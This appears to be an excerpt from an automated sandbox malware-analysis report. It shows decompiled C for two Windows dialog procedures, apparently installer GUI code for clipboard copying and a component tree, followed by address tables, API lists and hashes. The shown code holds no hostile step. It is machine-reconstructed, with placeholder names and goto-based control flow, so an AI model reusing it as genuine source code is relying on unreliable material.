				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423704;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F71, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t89 = CreatePopupMenu();
								_push(0xffffffe1);
								_push(_t149);
								_t160 = _t89;
								AppendMenuA(_t160, _t149, 1, E00405B16(_t149, _t154, _t160));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420530;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x4236ec == _t149) {
							ShowWindow( *0x423f24, 8);
							if( *0x423fac == _t149) {
								E00404E9F( *((intOrPtr*)( *0x41fd00 + 0x34)), _t149);
							}
							E00403ECE(1);
							goto L25;
						}
						 *0x41f8f8 = 2;
						E00403ECE(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403F5C(_a8, _a12, _a16);
						}
						ShowWindow( *0x4236f0, _t149);
						ShowWindow(_t154, 8);
						E00403F2A(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f28;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x4236f0 = GetDlgItem(_a4, 0x403);
				 *0x4236e8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423704 = _t127;
				_v8 = _t127;
				E00403F2A( *0x4236f0);
				 *0x4236f4 = E00404741(4);
				 *0x42370c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403EF5(_a4);
				if(( *0x423f30 & 0x00000003) != 0) {
					ShowWindow( *0x4236f0, _t149);
					if(( *0x423f30 & 0x00000002) != 0) {
						 *0x4236f0 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F2A( *0x4236e8);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f30 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

































                                                          0x00404fe6
                                                          0x00404fec
                                                          0x00404ff5
                                                          0x00404ff8
                                                          0x00405190
                                                          0x004051b4
                                                          0x004051b4
                                                          0x004051c7
                                                          0x004051e5
                                                          0x004051ec
                                                          0x00405243
                                                          0x00405247
                                                          0x00000000
                                                          0x0040524e
                                                          0x00405256
                                                          0x0040525e
                                                          0x00405261
                                                          0x0040535a
                                                          0x00000000
                                                          0x0040535a
                                                          0x00405267
                                                          0x0040526d
                                                          0x0040526f
                                                          0x00405270
                                                          0x0040527c
                                                          0x00405282
                                                          0x00405288
                                                          0x0040529d
                                                          0x004052a3
                                                          0x0040528a
                                                          0x0040528f
                                                          0x00405295
                                                          0x00405298
                                                          0x00405298
                                                          0x004052b3
                                                          0x004052bb
                                                          0x004052be
                                                          0x004052c7
                                                          0x004052ca
                                                          0x004052d1
                                                          0x004052d8
                                                          0x004052e0
                                                          0x004052e0
                                                          0x004052f7
                                                          0x004052f7
                                                          0x004052fe
                                                          0x00405304
                                                          0x0040530d
                                                          0x00405314
                                                          0x0040531d
                                                          0x0040531f
                                                          0x00405322
                                                          0x00405331
                                                          0x00405333
                                                          0x00405339
                                                          0x0040533a
                                                          0x0040533b
                                                          0x00405343
                                                          0x0040534e
                                                          0x00405354
                                                          0x00405354
                                                          0x00000000
                                                          0x004052be
                                                          0x00405247
                                                          0x004051f4
                                                          0x00405224
                                                          0x0040522c
                                                          0x00405237
                                                          0x00405237
                                                          0x0040523e
                                                          0x00000000
                                                          0x0040523e
                                                          0x004051f8
                                                          0x00405202
                                                          0x00000000
                                                          0x004051c9
                                                          0x004051cf
                                                          0x00405207
                                                          0x00000000
                                                          0x00405210
                                                          0x004051d8
                                                          0x004051dd
                                                          0x004051e0
                                                          0x00000000
                                                          0x004051e0
                                                          0x004051c7
                                                          0x00404ffe
                                                          0x00405002
                                                          0x0040500b
                                                          0x00405012
                                                          0x00405015
                                                          0x00405018
                                                          0x0040501b
                                                          0x0040501c
                                                          0x0040501d
                                                          0x00405036
                                                          0x00405039
                                                          0x00405043
                                                          0x00405052
                                                          0x0040505a
                                                          0x00405062
                                                          0x00405067
                                                          0x0040506a
                                                          0x00405076
                                                          0x0040507f
                                                          0x00405088
                                                          0x004050ab
                                                          0x004050b1
                                                          0x004050c2
                                                          0x004050c7
                                                          0x004050d5
                                                          0x004050e3
                                                          0x004050e3
                                                          0x004050e8
                                                          0x004050f6
                                                          0x004050f6
                                                          0x004050fb
                                                          0x004050fe
                                                          0x00405103
                                                          0x0040510f
                                                          0x00405118
                                                          0x00405125
                                                          0x00405134
                                                          0x00405127
                                                          0x0040512c
                                                          0x0040512c
                                                          0x00405140
                                                          0x00405140
                                                          0x00405154
                                                          0x0040515d
                                                          0x00405166
                                                          0x00405176
                                                          0x00405182
                                                          0x00405182
                                                          0x00000000

                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 0040503C
                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040504B
                                                          • GetClientRect.USER32 ref: 00405088
                                                          • GetSystemMetrics.USER32 ref: 00405090
                                                          • SendMessageA.USER32 ref: 004050B1
                                                          • SendMessageA.USER32 ref: 004050C2
                                                          • SendMessageA.USER32 ref: 004050D5
                                                          • SendMessageA.USER32 ref: 004050E3
                                                          • SendMessageA.USER32 ref: 004050F6
                                                          • ShowWindow.USER32(00000000,?), ref: 00405118
                                                          • ShowWindow.USER32(?,00000008), ref: 0040512C
                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040514D
                                                          • SendMessageA.USER32 ref: 0040515D
                                                          • SendMessageA.USER32 ref: 00405176
                                                          • SendMessageA.USER32 ref: 00405182
                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040505A
                                                            • Part of subcall function 00403F2A: SendMessageA.USER32 ref: 00403F38
                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040519F
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00004F71,00000000), ref: 004051AD
                                                          • CloseHandle.KERNEL32(00000000), ref: 004051B4
                                                          • ShowWindow.USER32(00000000), ref: 004051D8
                                                          • ShowWindow.USER32(?,00000008), ref: 004051DD
                                                          • ShowWindow.USER32(00000008), ref: 00405224
                                                          • SendMessageA.USER32 ref: 00405256
                                                          • CreatePopupMenu.USER32 ref: 00405267
                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040527C
                                                          • GetWindowRect.USER32(?,?), ref: 0040528F
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052B3
                                                          • SendMessageA.USER32 ref: 004052EE
                                                          • OpenClipboard.USER32(00000000), ref: 004052FE
                                                          • EmptyClipboard.USER32 ref: 00405304
                                                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 0040530D
                                                          • GlobalLock.KERNEL32 ref: 00405317
                                                          • SendMessageA.USER32 ref: 0040532B
                                                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405343
                                                          • SetClipboardData.USER32 ref: 0040534E
                                                          • CloseClipboard.USER32 ref: 00405354
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {
                                                          • API String ID: 590372296-366298937
                                                          • Opcode ID: b3ec08184f05c81d6d75b8571aa97232ad7eaacc78b900a8a85595b4445b9a13
                                                          • Instruction ID: ce63edb53461e73d1802b3fb2e279853447b443b010abc9b5e4e8924112ec9d2
                                                          • Opcode Fuzzy Hash: b3ec08184f05c81d6d75b8571aa97232ad7eaacc78b900a8a85595b4445b9a13
                                                          • Instruction Fuzzy Hash: 0AA14A70900209BFDB219F60DD89EAE7F79FB08355F00817AFA05BA2A0C7795A41DF59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004047EE Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E004047EE(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				intOrPtr _t258;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423f48;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423f28 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423f31 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E0040476E(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423f30) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42050c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x420524;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42050c = _t315;
								 *0x420524 = _t315;
								 *0x423f80 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423f31 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420524;
									_t196 =  *0x423f48;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423f4c <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x4236fc + 0x10)) != _t315) {
											E0040468C(0x3ff, 0xfffffffb, E00404741(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423f4c);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420524);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f80 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420524 = GlobalAlloc(0x40,  *0x423f4c << 2);
					_t250 = LoadBitmapA( *0x423f20, 0x6e);
					 *0x420518 =  *0x420518 | 0xffffffff;
					_v24 = _t250;
					 *0x420520 = SetWindowLongA(_v8, 0xfffffffc, E00404DEF);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42050c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42050c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if(_t258 != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							_push(_t258);
							_push(_t315);
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B16(_t286, _t315, _t320)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403EF5(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403EF5(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423f4c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420524 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420524 + _t318 * 4) = _t274;
									_t288 =  *( *0x420524 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423f4c);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F2A(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F2A(_v12);
								L89:
								return E00403F5C(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}



























































                                                          0x0040480c
                                                          0x00404812
                                                          0x00404814
                                                          0x0040481a
                                                          0x00404820
                                                          0x0040482d
                                                          0x00404836
                                                          0x00404839
                                                          0x0040483c
                                                          0x00404a64
                                                          0x00404a6b
                                                          0x00404a7f
                                                          0x00404a6d
                                                          0x00404a6f
                                                          0x00404a72
                                                          0x00404a73
                                                          0x00404a7a
                                                          0x00404a7a
                                                          0x00404a8b
                                                          0x00404a99
                                                          0x00404a9c
                                                          0x00404ab2
                                                          0x00404b2a
                                                          0x00404b2d
                                                          0x00404b2f
                                                          0x00404b39
                                                          0x00404b47
                                                          0x00404b47
                                                          0x00404b49
                                                          0x00404b53
                                                          0x00404b59
                                                          0x00404b7a
                                                          0x00404b5b
                                                          0x00404b68
                                                          0x00404b68
                                                          0x00404b59
                                                          0x00404b53
                                                          0x00000000
                                                          0x00404b2d
                                                          0x00404ab7
                                                          0x00404ac2
                                                          0x00404ac7
                                                          0x00404ace
                                                          0x00404ad5
                                                          0x00404adf
                                                          0x00404adf
                                                          0x00404ae3
                                                          0x00404ae8
                                                          0x00404aed
                                                          0x00404b03
                                                          0x00404aef
                                                          0x00404aef
                                                          0x00404af7
                                                          0x00404afe
                                                          0x00404af9
                                                          0x00404af9
                                                          0x00404af9
                                                          0x00404af7
                                                          0x00404b07
                                                          0x00404b09
                                                          0x00404b17
                                                          0x00404b18
                                                          0x00404b24
                                                          0x00404b27
                                                          0x00404b27
                                                          0x00404ae8
                                                          0x00000000
                                                          0x00404ad5
                                                          0x00404ab9
                                                          0x00404ac0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404b7d
                                                          0x00404b7d
                                                          0x00404b84
                                                          0x00404bf8
                                                          0x00404bff
                                                          0x00404c0b
                                                          0x00404c0b
                                                          0x00404c14
                                                          0x00404c16
                                                          0x00404c1d
                                                          0x00404c20
                                                          0x00404c20
                                                          0x00404c26
                                                          0x00404c2d
                                                          0x00404c30
                                                          0x00404c30
                                                          0x00404c36
                                                          0x00404c3c
                                                          0x00404c42
                                                          0x00404c42
                                                          0x00404c4f
                                                          0x00404d9c
                                                          0x00404da3
                                                          0x00404dc0
                                                          0x00404dc6
                                                          0x00404dd8
                                                          0x00404dd8
                                                          0x00000000
                                                          0x00404c55
                                                          0x00404c57
                                                          0x00404c5f
                                                          0x00404c63
                                                          0x00404c63
                                                          0x00404c6b
                                                          0x00404cac
                                                          0x00404cae
                                                          0x00404cbe
                                                          0x00404cc1
                                                          0x00404cc6
                                                          0x00404ccd
                                                          0x00404cd0
                                                          0x00404d72
                                                          0x00404d78
                                                          0x00404d86
                                                          0x00404d97
                                                          0x00404d97
                                                          0x00000000
                                                          0x00404d86
                                                          0x00404cd6
                                                          0x00404cd9
                                                          0x00404cdf
                                                          0x00404ce4
                                                          0x00404ce6
                                                          0x00404ce8
                                                          0x00404cee
                                                          0x00404cf5
                                                          0x00404cfa
                                                          0x00404d01
                                                          0x00404d04
                                                          0x00404d04
                                                          0x00404d0b
                                                          0x00404d17
                                                          0x00404d1b
                                                          0x00404d1d
                                                          0x00404d1d
                                                          0x00404d0d
                                                          0x00404d0f
                                                          0x00404d0f
                                                          0x00404d3d
                                                          0x00404d49
                                                          0x00404d58
                                                          0x00404d58
                                                          0x00404d5a
                                                          0x00404d5d
                                                          0x00404d66
                                                          0x00000000
                                                          0x00404c6d
                                                          0x00404c78
                                                          0x00404c7b
                                                          0x00404c80
                                                          0x00404c82
                                                          0x00404c86
                                                          0x00404c96
                                                          0x00404ca0
                                                          0x00404ca2
                                                          0x00404ca5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404c88
                                                          0x00404c88
                                                          0x00404c8e
                                                          0x00404c90
                                                          0x00404c90
                                                          0x00404c91
                                                          0x00404c92
                                                          0x00000000
                                                          0x00404c88
                                                          0x00404c6b
                                                          0x00404c4f
                                                          0x00404b8c
                                                          0x00000000
                                                          0x00404ba2
                                                          0x00404bac
                                                          0x00404bb1
                                                          0x00000000
                                                          0x00000000
                                                          0x00404bc3
                                                          0x00404bc8
                                                          0x00404bd4
                                                          0x00404bd4
                                                          0x00404bd6
                                                          0x00404be5
                                                          0x00404be7
                                                          0x00404bee
                                                          0x00404bf1
                                                          0x00000000
                                                          0x00404bf1
                                                          0x00404b8c
                                                          0x00404842
                                                          0x00404847
                                                          0x00404851
                                                          0x00404852
                                                          0x0040485b
                                                          0x00404866
                                                          0x00404871
                                                          0x00404877
                                                          0x00404885
                                                          0x0040489a
                                                          0x0040489f
                                                          0x004048aa
                                                          0x004048b3
                                                          0x004048c8
                                                          0x004048d9
                                                          0x004048e6
                                                          0x004048e6
                                                          0x004048eb
                                                          0x004048f1
                                                          0x004048f3
                                                          0x004048f6
                                                          0x004048fb
                                                          0x00404900
                                                          0x00404902
                                                          0x00404902
                                                          0x00404905
                                                          0x00404906
                                                          0x00404922
                                                          0x00404922
                                                          0x00404924
                                                          0x00404925
                                                          0x0040492a
                                                          0x0040492d
                                                          0x00404930
                                                          0x00404934
                                                          0x00404939
                                                          0x0040493e
                                                          0x00404942
                                                          0x00404947
                                                          0x0040494c
                                                          0x0040494e
                                                          0x00404956
                                                          0x00404a20
                                                          0x00404a33
                                                          0x00000000
                                                          0x0040495c
                                                          0x0040495f
                                                          0x00404962
                                                          0x00404965
                                                          0x00404965
                                                          0x0040496b
                                                          0x00404971
                                                          0x00404974
                                                          0x0040497a
                                                          0x0040497b
                                                          0x00404980
                                                          0x00404989
                                                          0x00404990
                                                          0x00404993
                                                          0x00404996
                                                          0x00404999
                                                          0x004049d5
                                                          0x004049fe
                                                          0x004049d7
                                                          0x004049e4
                                                          0x004049e4
                                                          0x0040499b
                                                          0x0040499e
                                                          0x004049ad
                                                          0x004049b7
                                                          0x004049bf
                                                          0x004049c6
                                                          0x004049ce
                                                          0x004049ce
                                                          0x00404999
                                                          0x00404a04
                                                          0x00404a05
                                                          0x00404a11
                                                          0x00404a11
                                                          0x00404a1e
                                                          0x00404a39
                                                          0x00404a3d
                                                          0x00404a5a
                                                          0x00404a5f
                                                          0x00404a62
                                                          0x00000000
                                                          0x00404a3f
                                                          0x00404a44
                                                          0x00404a4d
                                                          0x00404dda
                                                          0x00404dec
                                                          0x00404dec
                                                          0x00404a3d
                                                          0x00000000
                                                          0x00404a1e
                                                          0x00404956

                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404805
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404812
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 0040485E
                                                          • LoadBitmapA.USER32 ref: 00404871
                                                          • SetWindowLongA.USER32(?,000000FC,00404DEF), ref: 0040488B
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040489F
                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048B3
                                                          • SendMessageA.USER32 ref: 004048C8
                                                          • SendMessageA.USER32 ref: 004048D4
                                                          • SendMessageA.USER32 ref: 004048E6
                                                          • DeleteObject.GDI32(?), ref: 004048EB
                                                          • SendMessageA.USER32 ref: 00404916
                                                          • SendMessageA.USER32 ref: 00404922
                                                          • SendMessageA.USER32 ref: 004049B7
                                                          • SendMessageA.USER32 ref: 004049E2
                                                          • SendMessageA.USER32 ref: 004049F6
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404A25
                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A33
                                                          • ShowWindow.USER32(?,00000005), ref: 00404A44
                                                          • SendMessageA.USER32 ref: 00404B47
                                                          • SendMessageA.USER32 ref: 00404BAC
                                                          • SendMessageA.USER32 ref: 00404BC1
                                                          • SendMessageA.USER32 ref: 00404BE5
                                                          • SendMessageA.USER32 ref: 00404C0B
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404C20
                                                          • GlobalFree.KERNEL32(?), ref: 00404C30
                                                          • SendMessageA.USER32 ref: 00404CA0
                                                          • SendMessageA.USER32 ref: 00404D49
                                                          • SendMessageA.USER32 ref: 00404D58
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D78
                                                          • ShowWindow.USER32(?,00000000), ref: 00404DC6
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404DD1
                                                          • ShowWindow.USER32(00000000), ref: 00404DD8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
